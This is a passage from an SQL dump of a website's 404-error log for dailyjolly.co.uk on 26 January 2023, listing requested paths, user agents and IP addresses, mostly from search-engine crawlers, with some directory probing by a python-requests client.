10:38:22','/wp-content/plugins/html404/index.html','https://www.dailyjolly.co.uk','python-requests/2.27.1',NULL,404,'GET',NULL,'196.74.207.174'),(36951,'2023-01-26 10:40:58','/images/','https://www.dailyjolly.co.uk','python-requests/2.27.1',NULL,404,'GET',NULL,'196.74.207.174'),(36952,'2023-01-26 10:41:01','/uploads/','https://www.dailyjolly.co.uk','python-requests/2.27.1',NULL,404,'GET',NULL,'196.74.207.174'),(36953,'2023-01-26 10:41:03','/img/','https://www.dailyjolly.co.uk','python-requests/2.27.1',NULL,404,'GET',NULL,'196.74.207.174'),(36954,'2023-01-26 10:41:05','/upload/','https://www.dailyjolly.co.uk','python-requests/2.27.1',NULL,404,'GET',NULL,'196.74.207.174'),(36955,'2023-01-26 10:41:10','/gallery/','https://www.dailyjolly.co.uk','python-requests/2.27.1',NULL,404,'GET',NULL,'196.74.207.174'),(36956,'2023-01-26 10:41:12','/files/','https://www.dailyjolly.co.uk','python-requests/2.27.1',NULL,404,'GET',NULL,'196.74.207.174'),(36957,'2023-01-26 10:41:15','/pdf/','https://www.dailyjolly.co.uk','python-requests/2.27.1',NULL,404,'GET',NULL,'196.74.207.174'),(36958,'2023-01-26 10:41:17','/docs/','https://www.dailyjolly.co.uk','python-requests/2.27.1',NULL,404,'GET',NULL,'196.74.207.174'),(36959,'2023-01-26 10:47:58','/kerznkqg2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(36960,'2023-01-26 10:48:24','/onager3/1uaxen3f2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(36961,'2023-01-26 10:56:32','/wvmdkore2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.46'),(36962,'2023-01-26 10:59:14','/9ortrgpf2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(36963,'2023-01-26 11:14:28','/wnr6jsgf2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(36964,'2023-01-26 11:29:41','/limer/i2iq7mqf2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(36965,'2023-01-26 11:41:47','/body/t767wt5g2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(36966,'2023-01-26 11:54:06','/agilely6/diy2wckd2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(36967,'2023-01-26 11:59:04','/kite511f2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(36968,'2023-01-26 12:01:09','/kkot8j1g2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.46'),(36969,'2023-01-26 12:01:10','/theologian/agi7hzee2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.46'),(36970,'2023-01-26 12:06:36','/tails/ienhf46f2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(36971,'2023-01-26 12:23:25','/jk','https://www.dailyjolly.co.uk','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:81.0) Gecko/20100101 Firefox/81.0','https://www.dailyjolly.co.uk/index.php/jk',404,'GET',NULL,'173.208.253.82'),(36972,'2023-01-26 12:23:37','/centralization/w5j1pgkd2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.46'),(36973,'2023-01-26 12:24:22','/dhud0w2e2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(36974,'2023-01-26 12:28:41','/9r0qq63h2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(36975,'2023-01-26 12:32:07','/contents/int-aW50ZW/118dunci','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(36976,'2023-01-26 12:35:38','/tag/uk/166676972','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',NULL,404,'GET',NULL,'87.250.224.89'),(36977,'2023-01-26 12:38:00','/quanta/9r4tprkd2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(36978,'2023-01-26 12:39:58','/w3rabyde2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(36979,'2023-01-26 12:44:40','/agq1zayf2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.192'),(36980,'2023-01-26 12:57:40','/wtucgy7e2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(36981,'2023-01-26 12:59:06','/droitural/aioul1ye2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(36982,'2023-01-26 13:02:50','/jk','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3790 Safari/537.36 Edg/78.0.142.6','https://www.dailyjolly.co.uk/index.php/jk',404,'GET',NULL,'173.208.253.82'),(36983,'2023-01-26 13:10:39','/collection/em9vdglj-47','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(36984,'2023-01-26 13:18:40','/w1aglumg2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.192'),(36985,'2023-01-26 13:40:31','/mishmash/tnacf7hg2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.46'),(36986,'2023-01-26 13:53:47','/dts4mwgg2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(36987,'2023-01-26 14:07:28','/isv8gm1g2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(36988,'2023-01-26 14:13:29','/planoconvex/wbec8qye2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(36989,'2023-01-26 14:20:35','/kq1xj4xg2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(36990,'2023-01-26 14:22:18','/hierax2/9bg2g1te2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(36991,'2023-01-26 14:25:28','/kegqcf5g2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(36992,'2023-01-26 14:30:09','/1p82fgje2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.192'),(36993,'2023-01-26 14:36:11','/collie/k2lhvy0e2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(36994,'2023-01-26 14:46:16','/wblf2f2f2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(36995,'2023-01-26 15:14:00','/w35ofn0e2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.46'),(36996,'2023-01-26 15:14:43','/w7g66w5e2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(36997,'2023-01-26 15:15:51','/what-are-foam-boosters-and-why-dont-we-recommend-them','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',NULL,404,'GET',NULL,'213.180.203.87'),(36998,'2023-01-26 15:25:42','/1gbayrze2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(36999,'2023-01-26 15:26:48','/furcation2/t3b9bgse2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.46'),(37000,'2023-01-26 15:31:14','/jk','https://www.dailyjolly.co.uk','Mozilla/5.0 (iPhone; CPU iPhone OS 13_5_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.1 Mobile/15E148 Safari/604.1','https://www.dailyjolly.co.uk/index.php/jk',404,'GET',NULL,'173.208.253.82'),(37001,'2023-01-26 15:39:49','/robes/kub22cge2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.46'),(37002,'2023-01-26 16:06:49','/ads.txt','https://www.dailyjolly.co.uk','Google-adstxt',NULL,404,'GET',NULL,'66.249.65.123'),(37003,'2023-01-26 16:10:42','/hifi/932fwn2e2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(37004,'2023-01-26 16:29:11','/imkftnff2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37005,'2023-01-26 16:30:44','/body/isbtz5uf2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.192'),(37006,'2023-01-26 16:32:30','/imb6zwsg2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.46'),(37007,'2023-01-26 16:35:13','/behest2/tsb7kb0f2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.192'),(37008,'2023-01-26 16:40:04','/sitemap','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)',NULL,404,'GET',NULL,'162.55.85.215'),(37009,'2023-01-26 16:40:26','/sitemap','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)',NULL,404,'GET',NULL,'162.55.85.215'),(37010,'2023-01-26 16:40:47','/sitemap','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)',NULL,404,'GET',NULL,'162.55.85.215'),(37011,'2023-01-26 16:41:08','/sitemap','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)',NULL,404,'GET',NULL,'162.55.85.215'),(37012,'2023-01-26 16:41:30','/sitemap.txt','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)',NULL,404,'GET',NULL,'162.55.85.215'),(37013,'2023-01-26 16:41:52','/sitemap.txt','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)',NULL,404,'GET',NULL,'162.55.85.215'),(37014,'2023-01-26 16:42:14','/sitemap.txt','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)',NULL,404,'GET',NULL,'162.55.85.215'),(37015,'2023-01-26 16:42:35','/sitemap.txt','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)',NULL,404,'GET',NULL,'162.55.85.215'),(37016,'2023-01-26 16:42:56','/personal-services/index.html','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)',NULL,404,'GET',NULL,'162.55.85.215'),(37017,'2023-01-26 16:52:38','/articles/decisi21','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(37018,'2023-01-26 17:04:50','/dishelm/dtrkk2jd2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.46'),(37019,'2023-01-26 17:42:52','/tvs3h45h2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(37020,'2023-01-26 17:48:21','/de16ro3e2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(37021,'2023-01-26 17:53:17','/kor/9fjitgbe2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(37022,'2023-01-26 17:55:30','/anisopoda4/de1x9l8g2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(37023,'2023-01-26 18:00:37','/jk','https://www.dailyjolly.co.uk','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:103.0) Gecko/20100101 Firefox/103.0','https://www.dailyjolly.co.uk/index.php/jk',404,'GET',NULL,'173.208.253.82'),(37024,'2023-01-26 18:06:56','/ads.txt','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',NULL,404,'GET',NULL,'66.249.65.125'),(37025,'2023-01-26 18:19:05','/tzlj1h9e2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.46'),(37026,'2023-01-26 18:22:49','/km39ikae2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37027,'2023-01-26 18:26:27','/9ouora9f2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.192'),(37028,'2023-01-26 18:33:09','/gallopaded/9ojq8ckd2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(37029,'2023-01-26 18:38:53','/kec1wdoe2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37030,'2023-01-26 18:47:13','/jk','https://www.dailyjolly.co.uk','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:103.0) Gecko/20100101 Firefox/103.0','https://www.dailyjolly.co.uk/index.php/jk',404,'GET',NULL,'173.208.253.82'),(37031,'2023-01-26 18:51:16','/naughty21/iwraw1ye2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(37032,'2023-01-26 19:17:23','/squealing/iehwfp5e2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(37033,'2023-01-26 19:21:22','/becomed/i22kr6ce2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(37034,'2023-01-26 19:48:26','/transpired/9rou4n7g2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.32'),(37035,'2023-01-26 19:49:06','/knowledge-teapoy?yo=yaw&t=48co','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(37036,'2023-01-26 19:53:03','/jk','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0','https://www.dailyjolly.co.uk/index.php/jk',404,'GET',NULL,'173.208.253.82'),(37037,'2023-01-26 20:13:30','/browny50/kal9uhjd2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37038,'2023-01-26 20:22:06','/robes4/9or54ajd2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(37039,'2023-01-26 20:22:33','/9omwnxug2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(37040,'2023-01-26 20:30:14','/albizia/1l351tkd2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37041,'2023-01-26 20:36:43','/diojhi8e2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(37042,'2023-01-26 20:55:07','/1pml89xf2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(37043,'2023-01-26 20:55:34','/dxm35juf2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37044,'2023-01-26 20:58:44','/tutorial/iweb4x4e2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37045,'2023-01-26 21:00:23','/wilderment17/whbx1wce2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.32'),(37046,'2023-01-26 21:00:34','/scribe2/1ykwefye2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.46'),(37047,'2023-01-26 21:04:04','/adult-web-cams/index.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.32'),(37048,'2023-01-26 21:06:27','/923b2kze2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37049,'2023-01-26 21:07:42','/9r6emdmf2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.46'),(37050,'2023-01-26 21:13:56','/iw0mcpqe2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(37051,'2023-01-26 21:25:38','/boudoir2/9o7klu2f2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.46'),(37052,'2023-01-26 21:30:19','/14iiy1yg2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37053,'2023-01-26 21:31:49','/iyvle2pf2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37054,'2023-01-26 21:35:16','/wbsr744e2','https://www.dailyjolly.co.uk','Mozilla/5.0 